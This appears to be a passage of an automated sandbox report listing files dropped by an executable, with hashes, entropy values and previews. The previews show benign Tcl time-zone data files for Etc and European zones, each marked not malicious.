                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Etc/UCT) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):110
                                                                                                                                                                                                                              Entropy (8bit):4.903699772785336
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/yRF3yFNMXGm2OHvL:SlSWB9eg/yR9SDm2OHj
                                                                                                                                                                                                                              MD5:3D3F94B6AC5FA232E509356C703D9177
                                                                                                                                                                                                                              SHA1:502B8EE9D4A1EA75A91272181AC87B9B6ECE1F84
                                                                                                                                                                                                                              SHA-256:4D74D9EC2397B1708FEF47806294B0BCA26679F3A63149AE24E4E0C641976970
                                                                                                                                                                                                                              SHA-512:205A761A01C577F602236CB5C9938C834B7F3F9F681B94036B0A86101119893EF87D206D0C3F7737075ED833D4E35E374ACAE6605163E9C37B705D99BEBC928C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/UTC) {.. {-9223372036854775808 0 0 UTC}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):163
                                                                                                                                                                                                                              Entropy (8bit):4.874807282103623
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/yRYzXDJMFfh8RFB:SlSWB9vsM3yzTHAIgm6N/yRY7VMr8RX
                                                                                                                                                                                                                              MD5:65E28EFF342B625E79175793FD38F9FD
                                                                                                                                                                                                                              SHA1:08B11474822E670DEAB8F0EA168BAED7D5E3DBE1
                                                                                                                                                                                                                              SHA-256:A2B62C5914DE169A68A018A5B47C1253DBCA10A251862D17B0781ECFD19B6192
                                                                                                                                                                                                                              SHA-512:79641D0E05F81BFB80034937D34E74B7483A790F33C1F9A0FA92C6A7913AC8C03036CFDEFB43850B84EFB3DD3C4A39022DC8F22E5B5DE6353586A546E03A5789
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Etc/Universal) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):158
                                                                                                                                                                                                                              Entropy (8bit):4.874356623237119
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/yRaQEBURFB:SlSWB9vsM3yzTHAIgm6N/yRYaRX
                                                                                                                                                                                                                              MD5:EDABCAC858EC9632D5D8DCCFB28F4D6E
                                                                                                                                                                                                                              SHA1:E5BEF1367A97A1900749CE6B1E01CF32F582BDD9
                                                                                                                                                                                                                              SHA-256:BBD6E93206FF3B7017AFBE63905B4C932C422B582F3CE2A79A7B885D390EE555
                                                                                                                                                                                                                              SHA-512:3A22364D423F2F970123561408018A2B72F43C4978836D3B6DF7517217445605838DCB8DDBDA204FD01C49A4A7D5ADAD4CA8BDA7C3B412D54750BAEAA589B683
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Etc/Zulu) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.892809684252761
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/So3vXHAIgoq82yHRL/yQaiFAXowQahCv:SlSWB9vsM3ymhS2HAIgoh26N/ywAXoww
                                                                                                                                                                                                                              MD5:B0B409D665190569A56697799FBA5CD3
                                                                                                                                                                                                                              SHA1:840AA7D61E64ACE61FDDAB96F716575A61CEDB52
                                                                                                                                                                                                                              SHA-256:46141E7BC0F99D2117319C661569F8B38AF7D00108CED5784FA3A3B5090EF8E9
                                                                                                                                                                                                                              SHA-512:D7C0588D98AC46B5191D7C7E8F5181E94306EFFCC9E3F2DBA9E0003BAE51D992334527ADDD6D0C9701CFD60169A74984B3401E7A6A1322A734BC3D90DCC933BC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Brussels)]} {.. LoadTimeZoneFile Europe/Brussels..}..set TZData(:Europe/Amsterdam) $TZData(:Europe/Brussels)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6927
                                                                                                                                                                                                                              Entropy (8bit):3.8182041031531897
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:CA34elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxOrnW+:CI41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:D897DCA686A03495EB2C3323FAB0BEAD
                                                                                                                                                                                                                              SHA1:1433BC303DE92F7B36F881C8595A42B35E0814FC
                                                                                                                                                                                                                              SHA-256:F0B48DA7CA3659450D87CC0DDFDDFD28B464543DF1EE40D935C44D5CD7C9B9B3
                                                                                                                                                                                                                              SHA-512:A1C4AE1E0EC26B159B0F5D058A7A77B8774F611A4D3C6AECEDD7186957D6BD9F15CDFCBA248FCC8A4B4146BD72CD7D66B9F88A2BF7CDEF416F1831A2F335D48C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Andorra) {.. {-9223372036854775808 364 0 LMT}.. {-2177453164 0 0 WET}.. {-733881600 3600 0 CET}.. {481078800 7200 0 CEST}.. {496803600 3600 0 CET}.. {512528400 7200 1 CEST}.. {528253200 3600 0 CET}.. {543978000 7200 1 CEST}.. {559702800 3600 0 CET}.. {575427600 7200 1 CEST}.. {591152400 3600 0 CET}.. {606877200 7200 1 CEST}.. {622602000 3600 0 CET}.. {638326800 7200 1 CEST}.. {654656400 3600 0 CET}.. {670381200 7200 1 CEST}.. {686106000 3600 0 CET}.. {701830800 7200 1 CEST}.. {717555600 3600 0 CET}.. {733280400 7200 1 CEST}.. {749005200 3600 0 CET}.. {764730000 7200 1 CEST}.. {780454800 3600 0 CET}.. {796179600 7200 1 CEST}.. {811904400 3600 0 CET}.. {828234000 7200 1 CEST}.. {846378000 3600 0 CET}.. {859683600 7200 1 CEST}.. {877827600 3600 0 CET}.. {891133200 7200 1 CEST}.. {909277200 3600 0 CET}.. {922582800 7200 1 CEST}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2063
                                                                                                                                                                                                                              Entropy (8bit):3.679377249443024
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:TvCAs6kKR6aQmF1cSNWrI+AjXgV/Ap40FjDOP:rCAs6kC6aZF1cSN4I+AjXgV/ApDFjDM
                                                                                                                                                                                                                              MD5:CB860328FA96A14055BF51A3B2D35A08
                                                                                                                                                                                                                              SHA1:CFA49DC861F4AC3D29A78D63D71C2D6D83D68F84
                                                                                                                                                                                                                              SHA-256:4B5FB0AF225974D117374028285F20A02B833FF4136E6BFAE7B65E6D6D28829E
                                                                                                                                                                                                                              SHA-512:960152826F4245012462E53F80B69B0C45C27D75D46C70D485674CA19071DF268671C7691B614BE53B9E7BD8CFEC5D24F3DCF933F2F14D827F2A32EB347D7540
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Astrakhan) {.. {-9223372036854775808 11532 0 LMT}.. {-1441249932 10800 0 +03}.. {-1247540400 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 18000 1 +05}.. {591141600 14400 0 +04}.. {606866400 10800 0 +04}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 14400 0 +04}.. {701820000 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748998000 10800 0 +03}.. {764722800 14400 1 +04}.. {7
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7954
                                                                                                                                                                                                                              Entropy (8bit):3.7252594544513795
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:1D/8QdzFu+f+uO7DVopaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYf:Z/8ohvyDjivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:8B2C99E1CD04D7559709FDF8D382343C
                                                                                                                                                                                                                              SHA1:C595D5159C742B815AF89EC8604376E01291F9F1
                                                                                                                                                                                                                              SHA-256:47353319419505AAB205C23F8C97EA0B12E5DED2113147794F77B67349AFF52F
                                                                                                                                                                                                                              SHA-512:227CA21A3B6160357988582E261A62AE7B09D46D479EABFAC8039185D710EFA765CD1694F4388EBF8800978A1E1DB69F6AF9BB9BF82C0FCD66E883930E1F8249
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Athens) {.. {-9223372036854775808 5692 0 LMT}.. {-2344642492 5692 0 AMT}.. {-1686101632 7200 0 EET}.. {-1182996000 10800 1 EEST}.. {-1178161200 7200 0 EET}.. {-906861600 10800 1 EEST}.. {-904878000 7200 0 CEST}.. {-857257200 3600 0 CET}.. {-844477200 7200 1 CEST}.. {-828237600 3600 0 CET}.. {-812422800 7200 0 EET}.. {-552362400 10800 1 EEST}.. {-541652400 7200 0 EET}.. {166485600 10800 1 EEST}.. {186184800 7200 0 EET}.. {198028800 10800 1 EEST}.. {213753600 7200 0 EET}.. {228873600 10800 1 EEST}.. {244080000 7200 0 EET}.. {260323200 10800 1 EEST}.. {275446800 7200 0 EET}.. {291798000 10800 1 EEST}.. {307407600 7200 0 EET}.. {323388000 10800 1 EEST}.. {338936400 7200 0 EET}.. {347148000 7200 0 EET}.. {354675600 10800 1 EEST}.. {370400400 7200 0 EET}.. {386125200 10800 1 EEST}.. {401850000 7200 0 EET}.. {417574800 10800 1 EEST}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.876296755647751
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/yQahs3QavKL81n:SlSWB9vsM3ymvKA2PHAIgovKAH6N/y72
                                                                                                                                                                                                                              MD5:7160C6EE32380846653F016AE8AFD52A
                                                                                                                                                                                                                              SHA1:DE7805089639C54893F2107FA67342DA72A79BBC
                                                                                                                                                                                                                              SHA-256:557023674F6E8376707517103EE69C1DEBBE53CDD4BCAB11E763CC53B9CB1908
                                                                                                                                                                                                                              SHA-512:FDBDECBBDB0C419226E2604608FD2923CFB06E4B6948493208FD83FD796880E81F6147C0FAFEB572079C9C916831B7B055620EC939164CCA1DAF76897BE60F2C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:Europe/Belfast) $TZData(:Europe/London)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7309
                                                                                                                                                                                                                              Entropy (8bit):3.8204712502914653
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:lp+/4elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxOrnW+:lY41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:02A003411B61A311896A6407B622152A
                                                                                                                                                                                                                              SHA1:3B8BC6D1AF698CE7BB14A08307F5A4295EB8ED03
                                                                                                                                                                                                                              SHA-256:74B225511B518B0CED972CBB33D694697712CCB96A6D81E0F50ADA28CF6E2C92
                                                                                                                                                                                                                              SHA-512:9E03B3EB1E528E5B1ADBA09F808E73BF9C4314EDCBF6F96E46844D51A5F425BED3EE8FD5BA8706C46A7FB9882485F119F81996F2EAB7E1E9B598978C402DDE0F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Belgrade) {.. {-9223372036854775808 4920 0 LMT}.. {-2713915320 3600 0 CET}.. {-905824800 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-788922000 3600 0 CET}.. {-777942000 7200 1 CEST}.. {-766623600 3600 0 CET}.. {407199600 3600 0 CET}.. {417574800 7200 1 CEST}.. {433299600 3600 0 CET}.. {449024400 7200 1 CEST}.. {465354000 3600 0 CET}.. {481078800 7200 1 CEST}.. {496803600 3600 0 CET}.. {512528400 7200 1 CEST}.. {528253200 3600 0 CET}.. {543978000 7200 1 CEST}.. {559702800 3600 0 CET}.. {575427600 7200 1 CEST}.. {591152400 3600 0 CET}.. {606877200 7200 1 CEST}.. {622602000 3600 0 CET}.. {638326800 7200 1 CEST}.. {654656400 3600 0 CET}.. {670381200 7200 1 CEST}.. {686106000 3600 0 CET}.. {701830800 7200 1 CEST}.. {717555600 360
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8020
                                                                                                                                                                                                                              Entropy (8bit):3.820756136386754
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Pi9+qFR274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxo:PQs41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:84027C3C8315BD479B38DE11F38E873F
                                                                                                                                                                                                                              SHA1:6E92A2A9734A9C6B02ECCD99F114D667C909C5BA
                                                                                                                                                                                                                              SHA-256:7E7111F06288069B52A4E1CA0B016216DF9328FB3B1560A740146497CCDD4D24
                                                                                                                                                                                                                              SHA-512:5FFDE523021FC0C490261F55999204C9CE6C8C274888525EA6EE7C01BC5CCABC7A3877FD454B4167D81F4B89BACB087E8BA6AB0BAC46C2874ED9257BE2092340
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Berlin) {.. {-9223372036854775808 3208 0 LMT}.. {-2422054408 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-938905200 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-776559600 10800 0 CEMT}.. {-765936000 7200 1 CEST}.. {-761180400 3600 0 CET}.. {-757386000 3600 0 CET}.. {-748479600 7200 1 CEST}.. {-733273200 3600 0 CET}.. {-717631200 7200 1 CEST}.. {-714610800 10800 1 CEMT}.. {-710380800 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-684975600 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-654130800 7200 1 CEST}.. {-639010800 3600 0 CET}.. {315529200 3600 0 CET}.. {323830800 7200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.943205109348136
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVtXrAeovXHAIgoquXrsY6RL/yQahcvEB5yQazXrH:SlSWB9vsM3ymzbAeSHAIgozbsY6N/y7c
                                                                                                                                                                                                                              MD5:C69AB60BE74D4BB7E31BE4E5ECCD8FD2
                                                                                                                                                                                                                              SHA1:9DD0BA6171080F074858EF88ADA2E91C1F465619
                                                                                                                                                                                                                              SHA-256:1D7C539AAA1E3AD5EF3574A629523B5B781F1A91D352C9B39B8DE7316756026E
                                                                                                                                                                                                                              SHA-512:C273B97CCFB5F328EB7A13CCA3126DE8D91B3876CBD248990C0BE063DDBE5B0F31EA138E31A1C5C43B1ABCF42EA511448E6DC589EB99E8172D7C2A68BA31A8E7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Prague)]} {.. LoadTimeZoneFile Europe/Prague..}..set TZData(:Europe/Bratislava) $TZData(:Europe/Prague)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9223
                                                                                                                                                                                                                              Entropy (8bit):3.8450929464870804
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:RhcSQnG1Czyc1+FdDKDBb0S274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcM:Rh8zyc4Ss41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:E6C1153C3F71C8C005D7A46DDF6461FB
                                                                                                                                                                                                                              SHA1:CBDF7D5D36AF57D83859C910B493464617EC9571
                                                                                                                                                                                                                              SHA-256:1402A2072ADC9EBB35F4C0368D2E9A7A11493626C667C022614FFB7CC05B6CB6
                                                                                                                                                                                                                              SHA-512:8B1B47678F75DBE59DB08E034F0701BD11FF4FD3AD0304C8ABF45E848F717D2787B8E47558D3C334D369E0938C633DC217178D3EAE6486CEFBE25CF1668479F6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Brussels) {.. {-9223372036854775808 1050 0 LMT}.. {-2840141850 1050 0 BMT}.. {-2450995200 0 0 WET}.. {-1740355200 3600 0 CET}.. {-1693702800 7200 0 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-1613826000 0 0 WET}.. {-1604278800 3600 1 WEST}.. {-1585530000 0 0 WET}.. {-1574038800 3600 1 WEST}.. {-1552266000 0 0 WET}.. {-1539997200 3600 1 WEST}.. {-1520557200 0 0 WET}.. {-1507510800 3600 1 WEST}.. {-1490576400 0 0 WET}.. {-1473642000 3600 1 WEST}.. {-1459126800 0 0 WET}.. {-1444006800 3600 1 WEST}.. {-1427677200 0 0 WET}.. {-1411952400 3600 1 WEST}.. {-1396227600 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364778000 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333328400 0 0 WET}.. {-1316394000 3600 1 WEST}.. {-1301263200 0 0 WET}.. {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7974
                                                                                                                                                                                                                              Entropy (8bit):3.7264631277913853
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:vMSsQMAz5CXNU5paNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBK0:vMS1kdUoivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:88DB5686937D3499A8142413B2CF2EB5
                                                                                                                                                                                                                              SHA1:E37BAD2127553600D0E38A43053D1B07B2498DA8
                                                                                                                                                                                                                              SHA-256:C560D45104A8DD73FC7370B5AC1615E22043DBC93DFB46A9ECC6468C2D38B19A
                                                                                                                                                                                                                              SHA-512:375B8A63CFF2E278CD8C78BF9DBC86288FFB1AD57DAED00CD2199F0B05F4FBFA7D17D93C6458B20B86F6D05F3E3A49D594E60AC97DDB47141E21D7CDE10F8456
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Bucharest) {.. {-9223372036854775808 6264 0 LMT}.. {-2469404664 6264 0 BMT}.. {-1213148664 7200 0 EET}.. {-1187056800 10800 1 EEST}.. {-1175479200 7200 0 EET}.. {-1159754400 10800 1 EEST}.. {-1144029600 7200 0 EET}.. {-1127700000 10800 1 EEST}.. {-1111975200 7200 0 EET}.. {-1096250400 10800 1 EEST}.. {-1080525600 7200 0 EET}.. {-1064800800 10800 1 EEST}.. {-1049076000 7200 0 EET}.. {-1033351200 10800 1 EEST}.. {-1017626400 7200 0 EET}.. {-1001901600 10800 1 EEST}.. {-986176800 7200 0 EET}.. {-970452000 10800 1 EEST}.. {-954727200 7200 0 EET}.. {296604000 10800 1 EEST}.. {307486800 7200 0 EET}.. {323816400 10800 1 EEST}.. {338940000 7200 0 EET}.. {354672000 10800 0 EEST}.. {370396800 7200 0 EET}.. {386121600 10800 1 EEST}.. {401846400 7200 0 EET}.. {417571200 10800 1 EEST}.. {433296000 7200 0 EET}.. {449020800 10800 1 EEST}.. {465
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8287
                                                                                                                                                                                                                              Entropy (8bit):3.8244305880244567
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:rHw0+D5xp4elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxo:rQXj41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:11468F958796F971ADD5FB1A0C426D78
                                                                                                                                                                                                                              SHA1:3FA58BEF391BCF7BAC6A124D093B6505B4EAC452
                                                                                                                                                                                                                              SHA-256:B58F3E9066B8B57EB037D509636AA67A06ACC8348BE6C48482D87CDC49844A4E
                                                                                                                                                                                                                              SHA-512:0492EABD6EE16392C00A196AF38995E5F9E55E30A82A50EFFB381DC978E9E63E801555CDC219869E6251BD51115972F742D8A7D9524372B8B11702AE4B28BFB7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Budapest) {.. {-9223372036854775808 4580 0 LMT}.. {-2498260580 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1640998800 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-1600470000 7200 1 CEST}.. {-1587250800 3600 0 CET}.. {-1569711600 7200 1 CEST}.. {-1555196400 3600 0 CET}.. {-906775200 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-788922000 3600 0 CET}.. {-778471200 7200 1 CEST}.. {-762656400 3600 0 CET}.. {-749689200 7200 1 CEST}.. {-733276800 3600 0 CET}.. {-717634800 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-686185200 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-654130800 7200 1 CEST}.. {-639010800 3600 0 CET}.. {-492656400 7
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.952483060656419
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVnCMPfXHAIgoqkCM4ARL/yQahDZALMFB5h8Qa5CMS:SlSWB9vsM3ym5XPHAIgo5gAN/y7D17/f
                                                                                                                                                                                                                              MD5:CED145F8D9B231234E021D2214C1064B
                                                                                                                                                                                                                              SHA1:7B111DC24CA01C78A382CECD3247CF495D71CD34
                                                                                                                                                                                                                              SHA-256:F511A80AB70FF93A0EB9F29293F73DF952B773BB33EB85D581E4FB1FE06E4F05
                                                                                                                                                                                                                              SHA-512:E2323C04BF99909ABA9A09A66F9B4696519B5F9FE3AF178FB04D5E0053F41CAA8B937DC4148954ED093D317F454E0547786BEC934F2ABF22A60AAA6A24E63BF9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Zurich)]} {.. LoadTimeZoneFile Europe/Zurich..}..set TZData(:Europe/Busingen) $TZData(:Europe/Zurich)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8096
                                                                                                                                                                                                                              Entropy (8bit):3.7635458172251406
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:jXSsijEpkv2XkN8qc/OyEie8hF5WQ9VX/Zs1cw27oXqdCA5XqjqFLigTE9s5VpJ:jXS+WeUqKie8hF5f9PwdXM9
                                                                                                                                                                                                                              MD5:E7F52393523729CA3916768B3F3B4E55
                                                                                                                                                                                                                              SHA1:1524A3E610DCD33AC0006946BAB2929CA7F5A33F
                                                                                                                                                                                                                              SHA-256:2BD1C0AB412A5E9C97F533C4D06B773D045215B92568A4E89ADC93C7462D62EC
